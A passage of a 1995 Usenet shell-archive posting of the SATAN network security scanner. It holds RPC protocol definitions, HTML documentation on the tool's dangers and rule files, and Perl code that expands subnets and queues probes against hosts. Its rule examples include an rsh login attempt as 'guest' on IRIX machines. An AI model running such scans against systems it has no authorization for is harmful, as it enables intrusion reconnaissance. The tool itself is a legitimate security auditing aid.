X YPXFR_SUCC = 1,
X YPXFR_AGE = 2,
X YPXFR_NOMAP = -1,
X YPXFR_NODOM = -2,
X YPXFR_RSRC = -3,
X YPXFR_RPC = -4,
X YPXFR_MADDR = -5,
X YPXFR_YPERR = -6,
X YPXFR_BADARGS = -7,
X YPXFR_DBM = -8,
X YPXFR_FILE = -9,
X YPXFR_SKEW = -10,
X YPXFR_CLEAR = -11,
X YPXFR_FORCE = -12,
X YPXFR_XFRERR = -13,
X YPXFR_REFUSED = -14
X};
X
X
Xtypedef string domainname<YPMAXDOMAIN>;
Xtypedef string mapname<YPMAXMAP>;
Xtypedef string peername<YPMAXPEER>;
Xtypedef opaque keydat<YPMAXRECORD>;
Xtypedef opaque valdat<YPMAXRECORD>;
X
X
Xstruct YPmap_parms {
X domainname domain;
X mapname map;
X unsigned int ordernum;
X peername peer;
X};
X
Xstruct YPreq_key {
X domainname domain;
X mapname map;
X keydat key;
X};
X
Xstruct YPreq_nokey {
X domainname domain;
X mapname map;
X};
X
Xstruct YPreq_xfr {
X YPmap_parms map_parms;
X unsigned int transid;
X unsigned int prog;
X unsigned int port;
X};
X
X
Xstruct YPresp_val {
X YPstat stat;
X valdat val;
X};
X
Xstruct YPresp_key_val {
X YPstat stat;
X keydat key;
X valdat val;
X};
X
X
Xstruct YPresp_master {
X YPstat stat;
X peername peer;
X};
X
Xstruct YPresp_order {
X YPstat stat;
X unsigned int ordernum;
X};
X
Xunion YPresp_all switch (bool more) {
Xcase TRUE:
X YPresp_key_val val;
Xcase FALSE:
X void;
X};
X
Xstruct YPresp_xfr {
X unsigned int transid;
X YPxfrstat xfrstat;
X};
X
Xstruct YPmaplist {
X mapname map;
X YPmaplist *next;
X};
X
Xstruct YPresp_maplist {
X YPstat stat;
X YPmaplist *maps;
X};
X
Xenum YPpush_status {
X YPPUSH_SUCC = 1, /* Success */
X YPPUSH_AGE = 2, /* Master's version not newer */
X YPPUSH_NOMAP = -1, /* Can't find server for map */
X YPPUSH_NODOM = -2, /* Domain not supported */
X YPPUSH_RSRC = -3, /* Local resource alloc failure */
X YPPUSH_RPC = -4, /* RPC failure talking to server */
X YPPUSH_MADDR = -5, /* Can't get master address */
X YPPUSH_YPERR = -6, /* YP server/map db error */
X YPPUSH_BADARGS = -7, /* Request arguments bad */
X YPPUSH_DBM = -8, /* Local dbm operation failed */
X YPPUSH_FILE = -9, /* Local file I/O operation failed */
X YPPUSH_SKEW = -10, /* Map version skew during transfer */
X YPPUSH_CLEAR = -11, /* Can't send "Clear" req to local YPserv */
X YPPUSH_FORCE = -12, /* No local order number in map use -f flag. */
X YPPUSH_XFRERR = -13, /* YPxfr error */
X YPPUSH_REFUSED = -14 /* Transfer request refused by YPserv */
X};
X
Xstruct YPpushresp_xfr {
X unsigned transid;
X YPpush_status status;
X};
X
X/*
X * Response structure and overall result status codes. Success and failure
X * represent two separate response message types.
X */
X
Xenum YPbind_resptype {
X YPBIND_SUCC_VAL = 1,
X YPBIND_FAIL_VAL = 2
X};
X
Xstruct YPbind_binding {
X opaque YPbind_binding_addr[4]; /* In network order */
X opaque YPbind_binding_port[2]; /* In network order */
X};
X
Xunion YPbind_resp switch (YPbind_resptype YPbind_status) {
Xcase YPBIND_FAIL_VAL:
X unsigned YPbind_error;
Xcase YPBIND_SUCC_VAL:
X YPbind_binding YPbind_bindinfo;
X};
X
X/* Detailed failure reason codes for response field YPbind_error*/
X
Xconst YPBIND_ERR_ERR = 1; /* Internal error */
Xconst YPBIND_ERR_NOSERV = 2; /* No bound server for passed domain */
Xconst YPBIND_ERR_RESC = 3; /* System resource allocation failure */
X
X
X/*
X * Request data structure for YPbind "Set domain" procedure.
X */
Xstruct YPbind_setdom {
X domainname YPsetdom_domain;
X YPbind_binding YPsetdom_binding;
X unsigned YPsetdom_vers;
X};
X
X
X/*
X * YP access protocol
X */
Xprogram YPPROG {
X version YPVERS {
X void
X YPPROC_NULL(void) = 0;
X
X bool
X YPPROC_DOMAIN(domainname) = 1;
X
X bool
X YPPROC_DOMAIN_NONACK(domainname) = 2;
X
X YPresp_val
X YPPROC_MATCH(YPreq_key) = 3;
X
X YPresp_key_val
X YPPROC_FIRST(YPreq_key) = 4;
X
X YPresp_key_val
X YPPROC_NEXT(YPreq_key) = 5;
X
X YPresp_xfr
X YPPROC_XFR(YPreq_xfr) = 6;
X
X void
X YPPROC_CLEAR(void) = 7;
X
X YPresp_all
X YPPROC_ALL(YPreq_nokey) = 8;
X
X YPresp_master
X YPPROC_MASTER(YPreq_nokey) = 9;
X
X YPresp_order
X YPPROC_ORDER(YPreq_nokey) = 10;
X
X YPresp_maplist
X YPPROC_MAPLIST(domainname) = 11;
X } = 2;
X} = 100004;
X
X
X/*
X * YPPUSHPROC_XFRRESP is the callback routine for result of YPPROC_XFR
X */
Xprogram YPPUSH_XFRRESPPROG {
X version YPPUSH_XFRRESPVERS {
X void
X YPPUSHPROC_NULL(void) = 0;
X
X YPpushresp_xfr
X YPPUSHPROC_XFRRESP(void) = 1;
X } = 1;
X} = 0x40000000; /* transient: could be anything up to 0x5fffffff */
X
X
X/*
X * YP binding protocol
X */
Xprogram YPBINDPROG {
X version YPBINDVERS {
X void
X YPBINDPROC_NULL(void) = 0;
X
X YPbind_resp
X YPBINDPROC_DOMAIN(domainname) = 1;
X
X void
X YPBINDPROC_SETDOM(YPbind_setdom) = 2;
X } = 2;
X} = 100007;
X
X
END_OF_FILE
if test 6297 -ne `wc -c <'satan-1.1.1/src/yp-chk/yp.x'`; then
echo shar: \"'satan-1.1.1/src/yp-chk/yp.x'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/yp-chk/yp.x'
fi
echo shar: End of archive 6 $of 15$.
cp /dev/null ark6isdone

Wietse Venema

unread,

Apr 13, 1995, 3:00:00 AM4/13/95

Submitted-by: wswi...@wsbs06.win.tue.nl (Wietse Venema)
Posting-number: Volume 47, Issue 131
Archive-name: satan/part07

Environment: UNIX && HTML && Perl 5.0

#! /bin/sh

# This is a shell archive. Remove anything before this line, then feed it
# into a shell via "sh file" or similar. To overwrite existing files,
# type "sh file -c".

# Contents: satan-1.1.1/html/docs/dangers.html
# satan-1.1.1/html/docs/satan.rules.html satan-1.1.1/perl/targets.pl
# satan-1.1.1/src/nfs-chk/nfs_prot.x
# satan-1.1.1/src/rpcgen/rpc_cout.c
# satan-1.1.1/src/rpcgen/rpc_hout.c
# satan-1.1.1/src/rpcgen/rpc_util.c
# Wrapped by kent@ftp on Wed Apr 12 20:30:09 1995

PATH=/bin:/usr/bin:/usr/ucb:/usr/local/bin:/usr/lbin:$PATH ; export PATH
echo If this archive is complete, you will see the following message:

echo ' "shar: End of archive 7 (of 15)."'
if test -f 'satan-1.1.1/html/docs/dangers.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/docs/dangers.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/docs/dangers.html'\" $6130 characters$
sed "s/^X//" >'satan-1.1.1/html/docs/dangers.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<title>Dangers of SATAN</title>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>

X<H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">Dangers of SATAN</H1>
X<HR>
XHow could a friendly program such as SATAN be called dangerous? Well,
Xthere are two reasons; first, system crackers, potential intruders, or
Xsimply random people on the Internet could run the program against hosts
Xthat they have no authorization to do so against. This could be a
Xproblem especially since some of the probes that SATAN uses are very
Xsimilar to some attack methods used by system crackers (and that's part
Xof the reason that it works so well), and alarms and blood pressures
Xcould be raised unnecessarily. The second reason is that even a
Xwell-intentioned system administrator could run SATAN on her or his
Xsystem and it could follow lines of trust or potential vulnerability far
Xbeyond their authorized e-borders and anger or frustrate their
Xneighbors. The safest way to run SATAN is behind a firewall - since
XSATAN will only probe systems that it has IP connectivity to, it will
Xnever cross the firewall host (assuming IP_FORWARDING is turned off.)
XBe <STRONG>VERY</STRONG> careful if you're running SATAN behind a firewall
Xthat allows inside users to have direct IP connectivity to hosts on
Xthe Internet! You are essentially on the Internet as far as SATAN
Xis concerned, so follow the above guidelines.
X
X<p>
XThe dangers of <I>writing</I> SATAN are tangible as well. One
Xof the authors lost his job because of it; there has been a letter
Xwriting campaign to stop the release of the program. People accuse
Xus of writing it for noterieties sake and pure personal gain. And
Xthe newspaper reports of the mission of the program have not been, as
Xthey say, wholly favorable.
X
X<p>
X<A NAME="leashing-satan"><H3>Controlling SATAN</H3></A>
XSATAN has three main safeguards built into the program. First, it will
Xnever venture further than the <I>proximity level</I> number of
Xhosts away from the original target or subnet. Each host or ring of
Xhosts that is/are adjacent to the original target is one proximity level
Xfurther away. So if the proximity level is set to two, SATAN will never
Xattack more than two hops away from the original target. This can still
Xbe a very sizable number of hosts, because it can progress
Xexponentially! See the <A HREF="satan.cf.html#prox-vars">config/satan.cf</A>
Xdocumentation for more on this topic. In addition to proximity levels,
Xit has two other methods to restrict SATAN's wanderings - the two
Xtargeting exception variables <I>"$only_attack_these"</I> and
X<I>"$dont_attack_these"</I>. The first can limit SATAN to probe only
Xhosts in a specified set of hosts, governed by their FQDN (such as
X<I>"berkeley.edu"</I>, <I>"sun.com"</I>, or whatever), and the second
Xcan inform SATAN that it shouldn't probe any hosts of a specific name -
Xfor instance, all military (<I>".mil"</I>) or government (<I>".gov"</I>)
Xsites. See the <A HREF="satan.cf.html#exceptions">config/satan.cf</A>
Xdocumentation for more on this topic.
X<p>
X<A NAME="boundary"><H3>Boundary issues - keeping track of where it
Xis</H3></A>
XWhen SATAN probes hosts, it updates a status file (called
X<i>status_file</i> by default) with a time stamp and with the last
Xexecuted action.
XSetting the verbose/debug flag (the "-v" option) will output the
Xcurrent host on the command line, but with quite a bit of other output
Xas well, and it can be difficult to keep track of things.
X<p>
X<A NAME="being-friendly"><H3>Being a very unfriendly neighbor</H3></A>
XIt is generally considered to be very rude and anti-social behavior to
Xscan someone else's hosts or networks without the explicit permission of
Xthe owner. <STRONG>Always</STRONG> ask if it'd be ok to scan outside of
Xyour own networks. If you're unsure about where SATAN will go, set the
X<A HREF="satan.cf.html#prox-vars">proximity levels</A> to be very low
X(start at zero!) and set the <A HREF="satan.cf.html#exceptions">
X$only_attack_these</A> variable to disallow SATAN from scanning anything
Xbut your own hosts.
X<p>
XPlease be considerate <I>and</I> smart; unauthorized scanning of your
XInternet neighbors, even if you think you're doing them a favor, can be
Xseen as a serious transgression on your part, and could engender not
Xonly ill will or bad feelings, but legal problems as well.
X<p>
X<A NAME="attack-or-not"><H3>Attacking vs. probing vs. scanning</H3></A>
XWhat is an attack, or a probe, or a scan? It's not always clear,
Xespecially as system administrators are getting more savy and aware of
Xthe enormous amount of traffic present on the Internet (see Steve
XBellovin's <A HREF="ftp://research.att.com/dist/smb/packets.ps">
Xpaper</A> on this topic for more information about this). For instance,
Xis a finger from a remote site an attack? Without knowing any of the
Xmotivations involved, it can't be ascertained. "Finger wars", or two
Xsites that use the <I>"tcp wrappers"</I> or similar software that will
Xautomatically finger a remote site that connects to it can bring down
Xhosts inadvertently.
X<p>
XCertainly SATAN could be used to attack systems, but just as certainly,
Xit wasn't designed for that. In the documentation we use scanning and
Xprobing fairly interchangeably, and as long as SATAN is used properly,
Xthat's all it will ever do. Be aware that many of the probes will
Xgenerate messages on the console or set off various alarms on the remote
Xtarget, however, so you should be aware of the potential for false
Xalarms and accusations that might be leveled against you.
X<p>
X<A NAME="legal"><H3>Legal problems with running SATAN</H3></A>
XNot only is it an unfriendly idea to run SATAN against a remote site
Xwithout permission, it is probably illegal as well. Do yourself and the
Xrest of the Internet a favor and don't do it! While we don't know of
Xanyone being charged with a crime or sued because they ran a security
Xtool against someone else, SATAN could change that. Heed the warnings,
Xlimit your scans to authorized hosts, and all should be well.
X
X<hr>
X<a href="satan_overview.html"> Back to the Introductory TOC/Index</a>
X

X</BODY>
X</HTML>
END_OF_FILE

if test 6130 -ne `wc -c <'satan-1.1.1/html/docs/dangers.html'`; then
echo shar: \"'satan-1.1.1/html/docs/dangers.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/docs/dangers.html'
fi
if test -f 'satan-1.1.1/html/docs/satan.rules.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/docs/satan.rules.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/docs/satan.rules.html'\" $8103 characters$
sed "s/^X//" >'satan-1.1.1/html/docs/satan.rules.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<title>SATAN Rulesets </title>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>

X<H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">SATAN Rulesets </H1>
X<HR>
XWhile not as potentially dangerous as the
X<a href="satan.cf.html">SATAN configuration file</a>, the collection of
Xfiles that make up SATAN's internal rules are probably the most important
Xpart of the entire SATAN system. All inferencing is done here; this is
Xhow SATAN determines, for instance, what the target's OS and hardware
Xtype is from the other data collected in the system. Generally
Xspeaking, the rule files determine:
X<p>
X<UL>
X<li> What is dangerous/potentially harmful.
X<li> What is <STRONG>not</STRONG> dangerous.
X<li> What network services are being run.
X</UL>
XIn addition, the rules also inform SATAN to run other probes based on
Xpast input; for instance, if the host is found to run <I>rexd</I>, then
Xthe <I>rexd.satan</I> probe might be run, based on a rule contained here.
X<p>
XThe files are nothing more than perl code that gets run when the program

Xinitializes; don't be intimidated by that, however - it is fairly easy
Xto read and is heavily commented (if you don't know perl, comments
X(lines that don't do anything) are lines that start with a sharp/pound
Xsign ("#")). Variables are tokens that start with a dollar sign; values
Xof 0 or null ("") typically mean false, unless otherwise noted.
X<p>

XThere are currently six (6) rule files, each governing a separate part
Xof SATAN's behavior (note: <I>facts</I> contain information that individual
XSATAN data collection modules (e.g. the ".satan" files) collect.)
X<OL>
X<li> <a href="#drop">rules/drop</a> - determines what facts should be ignored.
X<li> <a href="#facts">rules/facts </a> - deduces new facts from existing data.
X<li> <a href="#hosttype"> rules/hosttype </a> - tries to recognize host
Xtypes from telnet/ftp/smtp banners.
X
X<li> <a href="#services">rules/services </a> - classifies hosts by service type.
X<li> <a href="#todo">rules/todo </a> - specifies what probes to try next,
Xgiven information gathered so far.
X<li> <a href="#trust">rules/trust </a> - classifies trust relationships.
X</OL>
XThe easiest way to explain all of this is to just go over each file in
Xturn.
X<p>
X
X<a name="drop"> <H3>rules/drop</H3></a>
XThis contains rules that determine what facts should be ignored. Each
Xrule is applied once for each SATAN record that has an "a" in the status
Xfield (this means the host is available; see the
X<a href="satan.db.html#Status">SATAN Data Base Format</a> section.)
X<p>
XFor instance, SATAN assumes that CD-ROM drives are not harmful for
Xexport purposes; if we see a target host that exports <I>/cdrom</I>
Xor <I>/CDROM</I>, we assume it's harmless by telling SATAN to ignore
Xthis fact:
X<PRE>
X $text =~ /exports \/cdrom/i
X</PRE>
X(The <I>$text</I> variable holds the output of the SATAN probe,
X<I>showmount.satan</I> in this case; any of the global SATAN variables
Xcould be used.)
X<p>
X<a name="facts"><H3>rules/facts </H3></a>
X
XThis file contains rules that deduce new facts from existing data. Each
Xrule is executed once for each SATAN record that has an "a" in the
Xstatus field. (this means the host is available; see the
X<a href="satan.db.html#Status">SATAN database format</a> section.)
X<p>
XThe rule format is:
X<PRE>
X condition TAB fact
X</PRE>
X(Note - the <I>TAB</I> is the tab character, not the three letters "T",
X"A", and "B"!)
X<p>
XFor example, if we want to assume that if a host is running rexd it's
Xinsecure without trying to probe it further, we would put:
X<PRE>
X /runs rexd/ $target|assert|a|us|ANY@$target|ANY@ANY|REXD access|rexd is vulnerable
X</PRE>
XThe most difficult thing with the <I>rules/facts</I> file is that you
Xhave to understand the
X<a href="satan.db.html">SATAN data base format</a>; a good way to
Xunderstand that better is to merely look at any of the <I>.satan</I>
Xfiles in the main SATAN directory and look to see what the probe does
Xand what it outputs.
X<p>
X
X<a name="hosttype"> <H3>rules/hosttype</H3> </a>
XThis file contains rules that recognize host types from telnet/ftp/smtp
Xbanners; these are applied to every record that has a telnet, ftp, or
Xsendmail banner.
X<p> The format of this file is:
X<PRE>
X CLASS class_name
X condition TAB hosttype
X</PRE>
X(Note - the <I>TAB</I> is the tab character, not the three letters "T",
X"A", and "B"!)
X<p>
XThe class_name is used for the first rough breakdown by host type
Xin reports. It should be a major software category, such as SUN,
XAPOLLO, etc. For example, here is the code for recognizing a SUN and
Xits major OS revision:
X<PRE>
X CLASS SUN
X UNKNOWN && /SunOS/ "SunOS 4"
X /4.1\/SMI-4.1/ "SunOS 4"
X /SMI-SVR4/ "SunOS 5"
X</PRE>
X<p>
XWhile it looks fairly impenetrable, look at the examples given if you'd
Xlike to create your own rules and steal and modify the code we use to
Xdo this.
X<p>
X
X<a name="services"> <H3>rules/services</H3> </a>
XVery similar to the <a href="#hosttype">host type</a> ruleset, this file
Xcontains rules that translate the cryptic SATAN record data to something
Xthat is more suitable for reports. Again, each
Xrule is executed once for each SATAN record that has an "a" in the
Xstatus field. (this means the host is available; see the
X<a href="satan.db.html#Status">SATAN database format</a> section.)
X<p>
XFormat of this file is:
X<PRE>
X class_name
X condition TAB service_name TAB host
X</PRE>
XWhere the class_name is <I>SERVERS</I> or <I>CLIENTS</I>. For instance,
Xto classify a host as an NNTP server, you'd simply do this (in the
X<I>SERVERS</I> section):
X<PRE>
X $service eq "nntp" NNTP (Usenet news)
X</PRE>
X<p>
X<a name="todo"> <H3>rules/todo</H3> </a>
XThese are rules that specify what probes to try next. Each
Xrule is executed once for each SATAN record that has an "a" in the
Xstatus field. (this means the host is available; see the
X<a href="satan.db.html#Status">SATAN database format</a> section.)
X<p>
XFormat of this file is:
X<PRE>
X condition TAB target tool tool-arguments
X</PRE>
X(Note - the <I>TAB</I> is the tab character, not the three letters "T",
X"A", and "B"!)
X<p>
XThe condition is a logical expression (with the usual internal SATAN
Xvariables) that has to be satisfied in order for SATAN to run the probe
Xspecified; when the condition is satisfied, the tool is executed as:
X<PRE>
X tool tool-arguments target
X</PRE>
XSATAN keeps track of already executed tool invocations.
X<p>
XFor instance, if a host is running <I>ypserv</I>, we would
Xtypically run the <I>ypbind.satan</I> probe against it. This would be
Xdone as follows:
X<PRE>
X $service eq "ypserv" $target "ypbind.satan"
X</PRE>
X<p>
XIt's easy to put in a probe that, say, depends on the type of system
Xthat you're looking at. For instance, SGI/IRIX hosts have <I>guest</I>,
X<I>lp</I>, and other accounts with no password when taken out-of-the-box
Xfrom SGI. Here's how you could check to see if this is a problem:
X<PRE>
X /IRIX/ $target "rsh.satan" "-u guest"
X</PRE>
XThat would do an rsh as user guest to see if a command could be executed
Xremotely; SATAN would then record this fact in the results.
X
X<a name="trust"> <H3>rules/trust</H3> </a>
XSimilar to the host and service type rules, SATAN uses the trust rules
Xto translate the cryptic SATAN record data to something
Xthat is more suitable for reports. Again, each
Xrule is executed once for each SATAN record that has an "a" in the
Xstatus field. (this means the host is available; see the
X<a href="satan.db.html#Status">SATAN database format</a> section.)
X<p>
XFormat of this file is:
X<PRE>
X condition TAB name of relationship
X</PRE>
XWith the currrent <i>rules/trust</i> file, SATAN only begins to
Xscratch the surface. It handles only the most easily detected
Xforms of trust:
X<pre>
X $severity eq "l" remote login
X $text =~ /exports \S+ to/ file sharing
X $text =~ / mounts \S+/ file sharing
X</pre>

X<hr>
X<a href="satan_reference.html"> Back to the Reference TOC/Index</a>

X</BODY>
X</HTML>
END_OF_FILE

if test 8103 -ne `wc -c <'satan-1.1.1/html/docs/satan.rules.html'`; then
echo shar: \"'satan-1.1.1/html/docs/satan.rules.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/docs/satan.rules.html'
fi
if test -f 'satan-1.1.1/perl/targets.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perl/targets.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perl/targets.pl'\" $8470 characters$
sed "s/^X//" >'satan-1.1.1/perl/targets.pl' <<'END_OF_FILE'
X#
X# get_proximity(target) returns proximity by hostname.
X#
X# new_target(target, proximity) figures out what (still) needs to be done.
X#
X# save_all_hosts(path) saves the all_hosts table to file.
X#
X# read_all_hosts(path) reads the all_hosts table from file.
X#
X# drop_all_hosts(host) forget this host.
X#
X# merge_all_hosts(path) merge with in-core tables.
X#
X# set_host_time(host) set host access time (UTC).
X#
X# get_host_time(host) get host access time (UTC).
X#
X# version 3, Mon Mar 20 19:43:59 1995, last mod by wietse
X#
X
Xrequire 'perl/policy-engine.pl';
Xrequire 'perl/subnets.pl';
Xrequire 'perl/domains.pl';
Xrequire 'perl/get_host.pl';
Xrequire 'perl/shell.pl';
X
X#
X# Get proximity for this host.
X#
Xsub get_proximity
X{
X local($target) = @_;
X
X return 100 unless defined($all_hosts{$target});
X return $all_hosts{$target}{'proximity'};
X}
X
X#
X# Set up a list of primary targets. Primaries are special. They may be
X# expanded. After all the primaries are known we may have to do something
X# special, like forgetting everything we know about them.
X#
Xsub add_primary_target {
X local($target) = @_;
X
X # Do we expand or do we scan a host.
X if ($target =~ /^\d+\.\d+\.\d+$/ || $attack_proximate_subnets) {
X print "Add-primary: expand $target...\n" if $debug;
X &target_acquisition($target, 0, $attack_level);
X } else {
X print "Add-primary: $target\n" if $debug;
X &new_target($target, 0);
X }
X}
X
X#
X# Forget everything we know about primary targets (well, almost everything).
X# We must re-read the data base, or memory would be polluted with stale
X# inferences.
X#
Xsub fix_primary_targets {
X local(%temp_targets);
X
X if ($primaries_deleted) {
X print "Primaries being rescanned, rebuilding tables.\n" if $debug;
X %temp_targets = %new_targets;
X &save_satan_data();
X &read_satan_data();
X %new_targets = %temp_targets;
X $primaries_deleted = 0;
X }
X}
X
X#
X# Take a new potential target and let it cool down. This saves lots of
X# duplicate work.
X#
Xsub new_target
X{
X local($target, $proximity) = @_;
X
X return unless $target;
X
X # Make sure all current primaries are rescanned, not the hosts that
X # were primaries during some earlier scan.
X if ($proximity == 0) {
X $primaries_deleted = defined($all_hosts{$target});
X drop_old_todos($target);
X drop_old_facts($target);
X }
X
X # Toss circular paths.
X if (defined($all_hosts{$target})
X && $all_hosts{$target}{'proximity'} < $proximity) {
X return;
X }
X if (exists($new_targets{$target})
X && $new_targets{$target} <= $proximity) {
X return;
X }
X
X # Keep primary, keep shortest path.
X if ($proximity == 0 || !exists($new_targets{$target})
X || !defined($all_hosts{$target})
X || $all_hosts{$target}{'proximity'} > $proximity) {
X $new_targets{$target} = $proximity;
X print "Add-target: $target prox $proximity\n" if $debug;
X }
X}
X
X#
X# Probe targets.
X#
Xsub process_targets
X{
Xlocal($target, $proximity, $level, %temp_targets, %probe_targets);
X
Xwhile(sizeof(*new_targets) > 0) {
X %temp_targets = %new_targets;
X %new_targets = ();
X %probe_targets = ();
X
X # Generate probes according to policy restrictions.
X for $target (keys %temp_targets) {
X $proximity = $temp_targets{$target};
X
X # Instantiate new host.
X if (!defined($all_hosts{$target})) {
X &add_new_host($target, $proximity);
X }
X
X # Proximity may have changed.
X if ($all_hosts{$target}{'proximity'} > $proximity) {
X $all_hosts{$target}{'proximity'} = $proximity;
X }
X
X # Skip attack and target expansion if this host is off-limits.
X if (($level = &policy_engine($target, $proximity)) < 0) {
X print "process_targets: skip $target...\n" if $debug;
X next;
X }
X
X # Attack level contents may have changed.
X $all_hosts{$target}{'attack'} = $level;
X $check_alive_list .= "$target "
X if !defined($host_is_alive{$target});
X $probe_targets{$target} = $level;
X }
X }
X
X # Parallelize liveness checks.
X &check_alive();
X
X # Generate the probes.
X for $target (keys %probe_targets) {
X print "process_targets: probe $target...\n" if $debug;
X &target_attack($target, $probe_targets{$target});
X }
X}
X
X#
X# Add one target to the %all_hosts list. Set proximity, IP, preliminary
X# attack level, preliminary expansion flag.
X#
Xsub add_new_host
X{
Xlocal($target, $proximity) = @_;
X
X$all_hosts{$target}{'proximity'} = $proximity;
X$all_hosts{$target}{'attack'} = -1;
X$all_hosts{$target}{'expand'} = 0;
X$all_hosts{$target}{'IP'} = &get_host_addr($target);
X$subnet_flag = 0;
X$domain_flag = 0;
X}
X
X#
X# ping a list of hosts and find out what hosts are alive.
X#
Xsub check_alive {
X local ($host);
X
X if ($check_alive_list eq "") {
X return;
X }
X print "Check-pulse: $check_alive_list\n" if $debug;
X
X #
X # Cheat when ICMP is broken.
X #
X if ($dont_use_ping) {
X for $host (split(/\s+/, $check_alive_list)) {
X $host_is_alive{$host} = 1;
X $live_hosts++;
X }
X $check_alive_list = "";

X return;
X }
X
X #

X # Fping or bust.
X #
X &open_cmd(FPING, $long_timeout, "$FPING $check_alive_list")
X || die "cannot run $FPING: $!\n";
X while(<FPING>) {
X if (/(\S+) is alive/) {
X $host_is_alive{$1} = 1;
X $live_hosts++;
X } elsif ($debug && /(\S+) is unreachable/) {
X print "Skipping dead host - $1\n";
X }
X }
X close(FPING);
X $check_alive_list = "";
X}
X
X#
X# target attack; assign attacks, throw into todo queue
X#
Xsub target_attack
X{
Xlocal($target, $level) = @_;
X
Xif ($host_is_alive{$target}) {
X print "Prox: $all_hosts{$target}{'proximity'}\n" if $debug;
X print "AL : $all_hosts{$target}{'attack'}\n" if $debug;
X print "ALC : $all_hosts{$parent}{'attack'}\n" if $parent && $debug;
X
X for (@{$all_attacks[$level]}) {
X &add_todo($target, $_, "") if ! /\?/;

X }
X }
X}
X
X#

X# target acq; get subnets
X#
Xsub target_acquisition
X{
Xlocal($target, $proximity, $level) = @_;
Xlocal($targets_found);
X
X# Expand and then collect. Pass results through new_target() for
X# consistent handling of constraints and policies.
X&open_cmd (TARGETS, 120, "$GET_TARGETS $target");
Xwhile (<TARGETS>) {
X chop;
X next unless $_ = getfqdn($_);
X if (!defined($all_hosts{$_})) {
X &add_new_host($_, $proximity);
X }
X $all_hosts{$_}{'proximity'} = $proximity
X if ($all_hosts{$_}{'proximity'} > $proximity);
X $all_hosts{$_}{'expand'} = 1;
X $host_is_alive{$_} = 1;
X $live_hosts++;
X &new_target($_, $proximity);
X $targets_found++;
X }
Xclose(TARGETS);
Xdie "$GET_TARGETS failed - unable to expand subnet $target\n"
X if ($? || $targets_found < 1)
X}
X
X#
X# Save the %all_hosts array
X#
Xsub save_all_hosts {
Xlocal($all_hosts_file) = @_;
Xlocal($record, $host, $ip, $proximity, $level, $expand, $time);
X
Xopen(ALL_HOSTS, ">$all_hosts_file") ||
X die "Can't open $all_hosts_file (cache for all-hosts) for writing\n";
X
Xfor $host (keys %all_hosts) {
X $ip = $all_hosts{$host}{'IP'};
X $proximity = $all_hosts{$host}{'proximity'};
X $level = $all_hosts{$host}{'attack'};
X $expand = $all_hosts{$host}{'expand'};
X $time = $all_hosts{$host}{'time'};
X $record = "$host|$ip|$proximity|$level|$expand|$time";
X print ALL_HOSTS "$record\n";
X # print "save_all_hosts: $record\n" if $debug;
X }
Xclose(ALL_HOSTS);
X
X}
X
X#
X# Reset host info and derivatives
X#
Xsub clear_all_hosts {
X %all_hosts = ();
X %new_targets = ();
X &clear_subnet_info();
X &clear_domain_info();
X}
X
X#
X# suck in the all-hosts array from file
X#
Xsub read_all_hosts {
X local($all_hosts_file) = @_;
X
X &clear_all_hosts();
X &merge_all_hosts($all_hosts_file);
X}
X
X#
X# merge the in-core all-hosts array with one from file
X#
Xsub merge_all_hosts {
Xlocal($all_hosts_file) = @_;
Xlocal($count, $host, $ip, $proximity, $level, $time);
X
Xopen(ALL_HOSTS, $all_hosts_file) ||
X die "Can't open $all_hosts_file (cache for all-hosts) for reading\n";
X print "Reading all hosts info from $all_hosts_file...\n" if $debug;
X
X# read one line at a time, herky jerky motion... one trick pony, man...
Xwhile (<ALL_HOSTS>) {
X chop;
X $count = ($host, $ip, $proximity, $level, $expand, $time) = split(/\|/);
X if ($count != 6) {
X warn "corrupted $all_hosts_file: $_\n";
X next;
X }
X if (!defined($all_hosts{$host}{'proximity'})
X || $all_hosts{$host}{'proximity'} > $proximity) {
X $all_hosts{$host}{'IP'} = $ip;
X $all_hosts{$host}{'proximity'} = $proximity;
X $all_hosts{$host}{'attack'} = $level;
X $all_hosts{$host}{'expand'} = $expand;
X $all_hosts{$host}{'time'} = $time;
X }
X }
Xclose(ALL_HOSTS);
X}
X
X#
X# set the last access time for this host. Use numerical form for easy sorting.
X#
Xsub set_host_time {

X local($host) = @_;
X

X $all_hosts{$host}{'time'} = time();
X}
X
X#
X# get the last access time for this host. Use numerical form for easy sorting.
X#
Xsub get_host_time {

X local($host) = @_;
X

X return $all_hosts{$host}{'time'};
X}
X
X
X1;
END_OF_FILE
if test 8470 -ne `wc -c <'satan-1.1.1/perl/targets.pl'`; then
echo shar: \"'satan-1.1.1/perl/targets.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/perl/targets.pl'
fi
if test -f 'satan-1.1.1/src/nfs-chk/nfs_prot.x' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/nfs-chk/nfs_prot.x'\"
else
echo shar: Extracting \"'satan-1.1.1/src/nfs-chk/nfs_prot.x'\" $7868 characters$
sed "s/^X//" >'satan-1.1.1/src/nfs-chk/nfs_prot.x' <<'END_OF_FILE'

X#ifndef RPC_HDR
X%#ifndef lint
X%/*static char sccsid[] = "from: @(#)nfs_prot.x 1.2 87/10/12 Copyr 1987 Sun Micro";*/
X%/*static char sccsid[] = "from: @(#)nfs_prot.x 2.1 88/08/01 4.0 RPCSRC";*/
X%static char rcsid[] = "$Id: nfs_prot.x,v 1.1 1994/08/04 19:01:47 wollman Exp $";

X%#endif /* not lint */
X#endif
X

Xconst NFS_PORT = 2049;
Xconst NFS_MAXDATA = 8192;
Xconst NFS_MAXPATHLEN = 1024;
